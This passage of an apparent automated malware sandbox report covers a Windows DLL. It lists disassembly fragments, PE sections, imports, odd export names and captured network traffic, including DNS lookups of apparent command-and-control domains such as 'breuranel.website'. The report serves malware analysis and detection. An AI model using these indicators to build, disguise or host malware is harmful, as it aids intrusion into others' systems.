                                                                                      pop ebx
                                                                                      mov esp, ebp
                                                                                      pop ebp
                                                                                      push ecx
                                                                                      ret
                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                      xor ecx, ebp
                                                                                      call 00007F0D10C83A73h
                                                                                      jmp 00007F0D10C83E50h
                                                                                      mov ecx, dword ptr [ebp-14h]
                                                                                      xor ecx, ebp
                                                                                      call 00007F0D10C83A62h
                                                                                      jmp 00007F0D10C83E3Fh
                                                                                      push eax
                                                                                      push dword ptr fs:[00000000h]
                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      mov dword ptr [eax], ebp
                                                                                      mov ebp, eax
                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                      xor eax, ebp
                                                                                      push eax
                                                                                      push dword ptr [ebp-04h]
                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                      ret
                                                                                      push eax
                                                                                      push dword ptr fs:[00000000h]
                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      mov dword ptr [eax], ebp
                                                                                      mov ebp, eax
                                                                                      mov eax, dword ptr [100AA0D4h]
                                                                                      xor eax, ebp
                                                                                      push eax
                                                                                      mov dword ptr [ebp-10h], eax
                                                                                      push dword ptr [ebp-04h]
                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                      ret
                                                                                      push eax
                                                                                      inc dword ptr fs:[eax]

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x79f710x7a000False0.510071801358data6.7546243609IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60179729877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                      USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                      MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                      Exports

                                                                                      NameOrdinalAddress
                                                                                      BeGrass10x10016020
                                                                                      Fieldeight20x100162f0
                                                                                      Often30x10016510
                                                                                      Townenter40x100167a0

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 12, 2021 00:37:08.138408899 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.138458967 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.138557911 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.144805908 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.144840002 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.468203068 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.468302965 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.471484900 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.471517086 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.471929073 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.525940895 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.848328114 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.891207933 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.972404003 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.972512960 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.972582102 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.974659920 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.974698067 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.974714041 CEST49754443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:08.974726915 CEST4434975413.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.324203014 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.324264050 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.324605942 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.332449913 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.332494020 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.532701969 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.532824993 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.534596920 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.534621954 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.534996986 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.620332003 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.849668026 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.891135931 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.967940092 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.968015909 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.968296051 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.968647003 CEST49756443192.168.2.313.82.28.61
                                                                                      Oct 12, 2021 00:37:10.968667984 CEST4434975613.82.28.61192.168.2.3
                                                                                      Oct 12, 2021 00:37:49.746129990 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:49.746206999 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:49.746301889 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:49.747075081 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:49.747144938 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.068757057 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.068881989 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:50.071365118 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:50.071388006 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.071779013 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.074706078 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:50.115148067 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.185472012 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.185564995 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.185678959 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:50.185892105 CEST49784443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:50.185910940 CEST4434978440.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.213552952 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.213602066 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.214442968 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.214493990 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.214505911 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.317359924 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.318341970 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.321649075 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.321666002 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.322053909 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.333874941 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.363312960 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.363456964 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.364072084 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.364095926 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.364113092 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.364121914 CEST49785443192.168.2.352.97.223.66
                                                                                      Oct 12, 2021 00:37:50.364129066 CEST4434978552.97.223.66192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.390655041 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.390702963 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.390820026 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.391333103 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.391355038 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.495934010 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.496045113 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.498070955 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.498089075 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.498500109 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.501807928 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.543143034 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.554900885 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.554985046 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.555134058 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.555485010 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.555505991 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.555547953 CEST49786443192.168.2.352.97.151.2
                                                                                      Oct 12, 2021 00:37:50.555557013 CEST4434978652.97.151.2192.168.2.3
                                                                                      Oct 12, 2021 00:37:52.904436111 CEST49787443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:52.904473066 CEST4434978740.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:52.904546976 CEST49787443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:52.905592918 CEST49787443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:52.905608892 CEST4434978740.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:53.226494074 CEST4434978740.97.153.146192.168.2.3
                                                                                      Oct 12, 2021 00:37:53.226619005 CEST49787443192.168.2.340.97.153.146
                                                                                      Oct 12, 2021 00:37:54.148821115 CEST49787443192.168.2.340.97.153.146

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 12, 2021 00:37:08.106329918 CEST5600953192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:08.126542091 CEST53560098.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:08.982853889 CEST5902653192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:10.273961067 CEST4957253192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:10.294186115 CEST53495728.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:10.977236986 CEST5213053192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:29.591995001 CEST6329753192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:29.614368916 CEST53632978.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:32.060544014 CEST5836153192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:32.083794117 CEST53583618.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:49.723500013 CEST5377753192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST53537778.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.192079067 CEST5710653192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST53571068.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:50.371407986 CEST6035253192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST53603528.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:52.881088972 CEST5677353192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST53567738.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:54.267306089 CEST6098253192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST53609828.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:37:54.433736086 CEST5805853192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST53580588.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:38:11.003211975 CEST5153953192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:38:11.024405956 CEST53515398.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:38:14.975621939 CEST5058553192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:38:14.995378017 CEST53505858.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:38:31.045994043 CEST5670653192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:38:31.065346956 CEST53567068.8.8.8192.168.2.3
                                                                                      Oct 12, 2021 00:38:35.020976067 CEST5356953192.168.2.38.8.8.8
                                                                                      Oct 12, 2021 00:38:35.039261103 CEST53535698.8.8.8192.168.2.3

                                                                                      ICMP Packets

                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                      Oct 12, 2021 00:37:35.330707073 CEST192.168.2.38.8.8.8d034(Port unreachable)Destination Unreachable

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Oct 12, 2021 00:37:08.106329918 CEST192.168.2.38.8.8.80x7c2aStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:08.982853889 CEST192.168.2.38.8.8.80x5fc0Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:10.273961067 CEST192.168.2.38.8.8.80x6bc8Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:10.977236986 CEST192.168.2.38.8.8.80x690bStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:29.591995001 CEST192.168.2.38.8.8.80x7abcStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:32.060544014 CEST192.168.2.38.8.8.80xe37Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.723500013 CEST192.168.2.38.8.8.80xddc7Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.192079067 CEST192.168.2.38.8.8.80x4023Standard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.371407986 CEST192.168.2.38.8.8.80xbc64Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.881088972 CEST192.168.2.38.8.8.80x6e73Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.267306089 CEST192.168.2.38.8.8.80x65fStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.433736086 CEST192.168.2.38.8.8.80x55b2Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:11.003211975 CEST192.168.2.38.8.8.80x2b8bStandard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:14.975621939 CEST192.168.2.38.8.8.80x66e7Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:31.045994043 CEST192.168.2.38.8.8.80xdc09Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:38:35.020976067 CEST192.168.2.38.8.8.80x9ff6Standard query (0)msn.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Oct 12, 2021 00:37:08.126542091 CEST8.8.8.8192.168.2.30x7c2aNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:09.004950047 CEST8.8.8.8192.168.2.30x5fc0No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:10.294186115 CEST8.8.8.8192.168.2.30x6bc8No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:10.481112003 CEST8.8.8.8192.168.2.30xdf1eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:10.996918917 CEST8.8.8.8192.168.2.30x690bNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:29.614368916 CEST8.8.8.8192.168.2.30x7abcName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:32.083794117 CEST8.8.8.8192.168.2.30xe37Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:49.744034052 CEST8.8.8.8192.168.2.30xddc7No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)HHN-efz.ms-acdc.office.com52.97.223.66A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)HHN-efz.ms-acdc.office.com52.97.218.66A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)HHN-efz.ms-acdc.office.com52.98.208.18A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.211678028 CEST8.8.8.8192.168.2.30x4023No error (0)HHN-efz.ms-acdc.office.com52.97.147.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)FRA-efz.ms-acdc.office.com52.97.151.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)FRA-efz.ms-acdc.office.com52.97.151.34A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:50.389377117 CEST8.8.8.8192.168.2.30xbc64No error (0)FRA-efz.ms-acdc.office.com40.101.124.18A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:52.902503967 CEST8.8.8.8192.168.2.30x6e73No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)FRA-efz.ms-acdc.office.com52.97.135.82A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)FRA-efz.ms-acdc.office.com52.97.178.34A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.286405087 CEST8.8.8.8192.168.2.30x65fNo error (0)FRA-efz.ms-acdc.office.com52.97.151.18A (IP address)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                      Oct 12, 2021 00:37:54.451898098 CEST8.8.8.8192.168.2.30x55b2No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
